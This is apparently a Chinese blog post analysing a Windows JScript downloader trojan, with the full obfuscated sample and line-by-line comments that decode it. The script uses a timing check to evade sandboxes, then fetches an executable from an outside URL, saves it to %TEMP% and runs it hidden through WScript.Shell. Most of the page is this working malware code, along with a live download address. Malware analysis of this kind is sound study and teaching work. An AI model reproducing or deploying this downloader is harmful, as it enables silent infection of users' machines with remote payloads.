//经过样本分析和抓取,该恶意程序是款下载者木马。

//不懂的可以百度百科。

http://baike.baidu.com/link?url=0dNqFM8QIjEQhD71ofElH0wHGktIQ3sMxer47B4z_54LSHixZYLcNWDgisJAeMRN5yJKjMu3znZc_sMh43cuwK

var uKcZJmztw = "f";

var VLjBZijBRDIxir = "sd";

var mzHiDfbVgtzWL = "uhi";

var XrxesgIWQ = "ya";

var STgtocEaUgS = "f";

var Mccq = "gsd";

var YVFRNFKC = "a7o";

var zokYxgifSUOsDIn = "d8f";

var rysGOQRkJ = "hgs";

var fAJEpxv = "7";

var LzK = "u";

var WnKggbYjhbgaYK = "dfa";

var RQJm = "s";

var tcbpCSVm = "o";

var glYioNGTMO = "a";

var cMleB = "fkj";

var guMAPaymgfr = ";l";

var aWosZJAl = "d";

var rrruwakBVMdHT = "s";

var QcfK = "a"; //asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf

//---------------------------------

var wxGM = "f";

var wME = "sd";

var WYl = "hi";

var DgXr = "yau";

var OFbjPAVgdUDSr = "sdf";

var AKaUjBxV = "g";

var YWyNEBKTCAr = "a7o";

var UmkNXPoXKvV = "8f";

var jrUTHQOJCXz = "d";

var VMrAuxWTPKwLZbj = "hgs";

var hnAKwB = "au7";

var kuRwVoQ = "f";

var OXjw = "d";

var wSaGYFaTjPu = "aos";

var UdT = "j";

var wGKytuRmi = "k";

var FwSAu = ";lf";

var uSsmxvh = "d";

var xrUulSuJwZcZEin = "as";//asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf

////---------------------------------

var fvJysePITGsZ = "f";

var MJLm = "sd";

var OHdTWUSWyLDnD = "hi";

var NfkoHHanka = "au";

var pAJLp = "fy";

var xTeQe = "d";

var wolngRcKPNjI = "s";

var Ctd0 = "og";

var NGJpEc = "a7";

var johMrZhTBT = "f";

var rWRr = "d8";

var xhuyvlXNtG = "gs";

var AoFEsd = "7h";

var IarTKEg = "fau";

var UiCusNVVRYpV = "osd";

var SqXtHDCTAOoEfv = "ja";

var kSXJa = "k";

var AzMZQADlr = ";lf";

var OFZC = "sd";

var UFs = "a";//asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf

//-----------------------------------

var wiM = "ose";

var cdzFN = "l";

var gtVOEyZRPMBkY = "c";//close();

//-----------------------------------

var FKqYCuGSVDKEk = "e";

var yLdfoNQSLG = "Fil";

var Kegv = "o";

var REweUeFfsfzCC = "veT";

var mCxYdwKmDTeZ = "Sa";//savetofile();

//-----------------------------------

var orFCagIxftilPY = "on";

var AnB = "iti";

var OeuDh = "pos";//position

//-----------------------------------

var bxwfUYaplk = "e";

var ZHBIenDJhvi = "t";

var OmwNrBIs = "wri";//write()

//-----------------------------------

var IonAXHdnbsJsHYL = "e";

var svvPS = "typ";//type

//-----------------------------------

var RxDykD = "n";

var ftsB = "ope";//open

//-----------------------------------

var zZoO = "am";

var TSCSrKWiKQY = "tre";

var AIfn = "B.S";

var zbAsfUmIk = "D";

var uWdDgxvOZcUG = "O";

var MUSaOvH = "D";

var YZVOwlzLPfausz = "A";//"adodb.stream"

//-----------------------------------

var pNGkr = "ct";

var iqPSquxJgp = "je";

var bTJnufjW = "b";

var lIexL = "teO";

var kZBJ = "rea";

var derqHNng = "C";//creatobject("adodb.stream") 

var LiTxpjAMHxAgUQ = "4h4";

var WWzPWldMX = "6n";

var CuF0 = "k6j";

var oUHbKSEqhF = "0";

var lQP = "hu/";

var RQUOidonsf = "l.";

var NjKvurbzu = "ta";

var CSyCCMfj = "por";

var XcTxpkvH = "egy";

var aUucLqfydBnSn = "j";

var lTXzk = "ev";

var mpAARoVfxvEsej = ".n";

var NVJeSNhziHjX = "www";

var JFDhyk = "://";

var CFpmRSiBsMp = "p";

var rKP = "htt";//http://www.nevjegyportal.hu/ok6j6n4h4

//-----------------------------------

var uBtUfBIHbmz = "T";

var LwKK = "GE";// get

//-----------------------------------

var KRPXN = "pen";

var HrNtkpOuBMYa = "o";//open

//-----------------------------------

var OFdMpJOyw = "e";

var NlpqQU = "x";

var cZpOdxEyvqRfb = "7.e";

var cLfbaiuobq = "PO";

var XmXyEnhbtWhG = "M1";

var DQZEGAm = "ko";

var cKoUGmrGJtE = "SE";

var QasyJ = "Ky";//KySEKoM1PO7.exe

//-----------------------------------

var eQyCEVqQUazI = "%/";

var tNgKCALxxEpJMf = "P";

var mNYqbv = "M";

var FrwlCZOPjcmJvoE = "E";

var KyNfXZkSc = "%T";//%TEMP%/

//-----------------------------------

var AjbjrFWcHO = "gs";

var RyW = "in";

var LVlachWJa = "Str";

var NGjUy = "t";

var ZXMail = "n";

var XLaaPawDhGaz = "e";

var lRTf = "m";

var EGxwfaNKp = "ron";

var UCOpd = "vi";

var xZQvOWiNMG = "n";

var NLgbSPQIDLAIj = "ndE";

var Gyo = "xpa";

var gPYeoLnn = "E";//expendenvironmentstrings

//-----------------------------------

var kpsxpufDRzihIGv = "TP";

var vGOfgZZdOVh = "T";

var wJOAaSUgz = "LH";

var bPhWMdYs = "XM";

var AwpqZN = "2.";

var RNVidTrApbBfHO = "XML";

var ynXoQhqDiQydxVe = "MS";//msxml2.xmlhttp

//-----------------------------------

var zkeMzwunlwoMdUD = "n";

var oVQABSTeJWqKG = "Ru";

var WkRVEzGFpaMCAC = "ell";

var AoJg = "h";

var HDveUfs = "S";

var PGItzPyn = ".";

var iTVqHxcrEbduDt = "t";

var wxGWFQyhW = "rip";

var KDSFP = "c";

var nzV = "WS";//wscript.shell.run()

//-----------------------------------

var NFFhujLOFwsUs = "ct";

var kvZBOvoVgLSEG = "je";

var DXP = "b";

var zjRmzjunjFUys = "O";

var EcDMPFvaxG = "e";

var stMA = "at";

var KnALPhmOVixZ = "Cre";//createobject()

//-----------------------------------

var aCTc = new Date();

var SZT0 = aCTc.getMilliseconds();

WScript.Sleep(10);

var aCTc = new Date();

var bRDtyPAQicD = aCTc.getMilliseconds();

WScript.Sleep(10);

var aCTc = new Date();

var VrU = aCTc.getMilliseconds();

WScript.Sleep(10);

var aCTc = new Date();

var DEyWdL = aCTc.getMilliseconds();

//

var NdNAj = bRDtyPAQicD - SZT0;

//var NdNAj=new Date().getMilliseconds()-new Date().getMilliseconds();

//

//    10s

var HRORMjJ = VrU - bRDtyPAQicD;

//    10s

var YSc0 = DEyWdL - VrU;

//    10s

WshShell = WScript[KnALPhmOVixZ + stMA + EcDMPFvaxG + zjRmzjunjFUys + DXP + kvZBOvoVgLSEG + NFFhujLOFwsUs](nzV + KDSFP + wxGWFQyhW + iTVqHxcrEbduDt + PGItzPyn + HDveUfs + AoJg + WkRVEzGFpaMCAC);

//wshShell=wscript[createobject](wscript.shell.run);

function jmljvNFWjSplH(NLN){WshShell[oVQABSTeJWqKG + zkeMzwunlwoMdUD](NLN, 0, 0);}

//function jmljvNFWjSplH(NLN)

//{

//    WshShell[run](NLN,0,0);

//}

function OcEOsFHpWS(n){return ynXoQhqDiQydxVe + RNVidTrApbBfHO + AwpqZN + bPhWMdYs + wJOAaSUgz + vGOfgZZdOVh + kpsxpufDRzihIGv;}

//function OcEOsFHpWS(n)

//{

//    return MSxml2.xmlhttp;

//}

if ((NdNAj != HRORMjJ) || (HRORMjJ != YSc0)){fOikDMmzwkAuGlw = WshShell[gPYeoLnn + Gyo + NLgbSPQIDLAIj + xZQvOWiNMG + UCOpd + EGxwfaNKp + lRTf + XLaaPawDhGaz + ZXMail + NGjUy + LVlachWJa + RyW + AjbjrFWcHO](KyNfXZkSc + FrwlCZOPjcmJvoE + mNYqbv + tNgKCALxxEpJMf + eQyCEVqQUazI) + QasyJ + cKoUGmrGJtE + DQZEGAm + XmXyEnhbtWhG + cLfbaiuobq + cZpOdxEyvqRfb + NlpqQU + OFdMpJOyw;

//fOikDMmzwkAuGlw=/%temp%/ path

//WshShell[expendedenvironmentstrings](%temp%);

EFASPqJ = OcEOsFHpWS(0);

//var xmlHTTP=new ActiveObject("Microsoft.XMLHTTP");

wMRqfsrlJdPwT = WScript.CreateObject(EFASPqJ);

//

//xmlhttp object

//[HrNtkpOuBMYa + KRPXN]==open        

wMRqfsrlJdPwT[HrNtkpOuBMYa + KRPXN](LwKK + uBtUfBIHbmz, rKP + CFpmRSiBsMp + JFDhyk + NVJeSNhziHjX + mpAARoVfxvEsej + lTXzk + aUucLqfydBnSn + XcTxpkvH + CSyCCMfj + NjKvurbzu + RQUOidonsf + lQP + oUHbKSEqhF + CuF0 + WWzPWldMX + LiTxpjAMHxAgUQ, false);

//wMRqfsrlJdPwT(get,http://www.nevjegyportal.hu/ok6j6n4h4,false);

//xmlhttp.open("get","url",false);

wMRqfsrlJdPwT.send();

while (wMRqfsrlJdPwT.readystate < 4 ) {WScript.Sleep(1000)};

//readystate

elcHu = WScript[KnALPhmOVixZ + stMA + EcDMPFvaxG + zjRmzjunjFUys + DXP + kvZBOvoVgLSEG + NFFhujLOFwsUs](YZVOwlzLPfausz + MUSaOvH + uWdDgxvOZcUG + zbAsfUmIk + AIfn + TSCSrKWiKQY + zZoO);

//var adoStream=createobject("adodb.stream");

elcHu[HrNtkpOuBMYa + KRPXN]();

//adoStream.open();

elcHu[svvPS + IonAXHdnbsJsHYL] = 1;

//adoStream.type=1;

elcHu[OmwNrBIs + ZHBIenDJhvi + bxwfUYaplk](wMRqfsrlJdPwT.ResponseBody);

//adoStream.write(wMRqfsrlJdPwT.ResponseBody);

elcHu[OeuDh + AnB + orFCagIxftilPY] = 0;

//adoStream.position=0;

elcHu[mCxYdwKmDTeZ + REweUeFfsfzCC + Kegv + yLdfoNQSLG + FKqYCuGSVDKEk](fOikDMmzwkAuGlw, 2 );

//adoStream.savetofile(/%temp%/,2);

elcHu[gtVOEyZRPMBkY + cdzFN + wiM]();

//adoStream.close();

//

jmljvNFWjSplH("/%temp%/");

//WshShell[run](NLN,0,0)

NdNAj = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + new Date().getMilliseconds() + new Date().getMilliseconds();;

//10s

HRORMjJ = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + VrU + bRDtyPAQicD;

//new Date().getMilliseconds() - new Date().getMilliseconds()="asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + new Date().getMilliseconds() + new Date().getMilliseconds();

//10s

YSc0 = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + DEyWdL + VrU;

//10s

}

windows本地script脚本恶意代码分析(带注释)的更多相关文章

  1. 2018-2019-2 20165234 《网络对抗技术》 Exp4 恶意代码分析

    实验四 恶意代码分析 实验目的 1.监控自己系统的运行状态,看有没有可疑的程序在运行. 2.分析一个恶意软件,就分析Exp2或Exp3中生成后门软件:分析工具尽量使用原生指令或sysinternals ...

  2. 2018-2019-2 网络对抗技术 20165316 Exp4 恶意代码分析

    2018-2019-2 网络对抗技术 20165316 Exp4 恶意代码分析 一.原理与实践说明 1.实践目标 监控你自己系统的运行状态,看有没有可疑的程序在运行. 分析一个恶意软件,就分析Exp2 ...

  3. 2018-2019-2 20165312《网络攻防技术》Exp4 恶意代码分析

    2018-2019-2 20165312<网络攻防技术>Exp4 恶意代码分析 知识点总结 1.有关schtasks schtacks的作用:安排命令和程序定期运行或在指定时间内运行.从计 ...

  4. Exp4 恶意代码分析 20165110

    Exp4 恶意代码分析 20165110 一.实践目标 1.是监控你自己系统的运行状态,看有没有可疑的程序在运行. 2.是分析一个恶意软件,就分析Exp2或Exp3中生成后门软件:分析工具尽量使用原生 ...

  5. 2018-2019-2 网络对抗技术 20165318 Exp4 恶意代码分析

    2018-2019-2 网络对抗技术 20165318 Exp4 恶意代码分析 原理与实践说明 实践目标 实践内容概述 基础问题回答 实践过程记录 1.使用schtasks指令监控系统 2.使用sys ...

  6. 2018-2019-2 20165330《网络对抗技术》Exp4 恶意代码分析

    目录 基础问题 相关知识 实验目的 实验内容 实验步骤 实验过程中遇到的问题 实验总结与体会 实验目的 监控你自己系统的运行状态,看有没有可疑的程序在运行 分析一个恶意软件,就分析Exp2或Exp3中 ...

  7. 2018-2019-2 20165332 《网络对抗技术》Exp4 恶意代码分析

    2018-2019-2 20165332 <网络对抗技术>Exp4 恶意代码分析 原理与实践说明 1.实践目标 监控你自己系统的运行状态,看有没有可疑的程序在运行. 分析一个恶意软件,就分 ...

  8. 20165223《网络对抗技术》Exp4 恶意代码分析

    目录 -- 恶意代码分析 恶意代码分析说明 实验任务目标 实验内容概述 schtasks命令使用 实验内容 系统运行监控 恶意软件分析 静态分析 virscan分析和VirusTotal分析 PEiD ...

  9. Exp4 恶意代码分析

    一.原理与实践说明 1. 实践目标 1.1 监控你自己系统的运行状态,看有没有可疑的程序在运行. 1.2 分析一个恶意软件,就分析Exp2或Exp3中生成后门软件:分析工具尽量使用原生指令或sysin ...

随机推荐

  1. linux杀死jobs的正确方法

    输入命令:logout 终端显示:There are stopped jobs. 解决方法: 输入命令:jobs 终端显示:[]+ Stopped vim /etc/network/interface ...

  2. div+css 设计下拉

    css样式 <style type="text/css"> <!-- /* www.divcss5.com CSS下拉菜单实例 */ * { margin:; p ...

  3. linux常用命令汇总

    1. 文件及文件夹操作 1.1 修改文件名 mv abc ab 把文件名abc改为ab. 1.2 删除文件和文件夹 rm abc rm -rf abc 1.3 拷贝文件夹 格式: CP [选项]  源 ...

  4. 深入理解 '0' "0" '\0' 0 之间的区别

    看来基础还是很重要的,基础不扎实就难以学好c语言,就别说写出高质量的c语言代码了.今天,我就被这个问题折磨的不行了,哈哈,不过现在终于明白了‘\0’ ,‘0’, “0” 之间的区别了.困惑和快乐与你分 ...

  5. FAQ

    1.Baudrare and the speed of Byte. 2. Linux FS and Flash store. 3. SW's Coupling. 4. Protocol and Pro ...

  6. 一个简单确非常实用的javascript函数

    在写js的时候,往往会碰到字符串拼接的问题,如果简单,直接使用+号连接字符串就可以了, 但是如果复杂,+用起来就非常不爽,在.net中有,Sting.Format函数,用起来还是很爽的,于是就想着js ...

  7. CSS 如何使DIV层水平居中

    今天用CSS碰到个很棘手的问题,DIV本身没有定义自己居中的属性, 网上很多的方法都是介绍用上级的text-align: center然后嵌套一层DIV来解决问题. 可是事实上这样的方法科学吗? 经过 ...

  8. Knockout 官网翻译

    Knockout 新版应用开发教程之创建view models与监控属性 章节导航 最近抽出点时间研究MVVM,包括司徒正美的avalon,google的angular,以及Knockout,博客园T ...

  9. Nginx模块之———— RTMP模块 统计某频道在线观看流的客户数

    获得订阅者人数,可以方便地显示观看流的客户数. 查看已经安装好的模块 /usr/local/nginx/sbin/nginx -V 安装从源编译Nginx和Nginx-RTMP所需的工具 sudo a ...

  10. C#socket通信-----多线程

    我在之前的socket通信的基础上做了一点改进,使用多线程来使用,程序更加简洁实用.不足之处请指教哦! 话不多说,之前的随笔也有介绍,直接上代码啦! 服务端socket(serverSocket): ...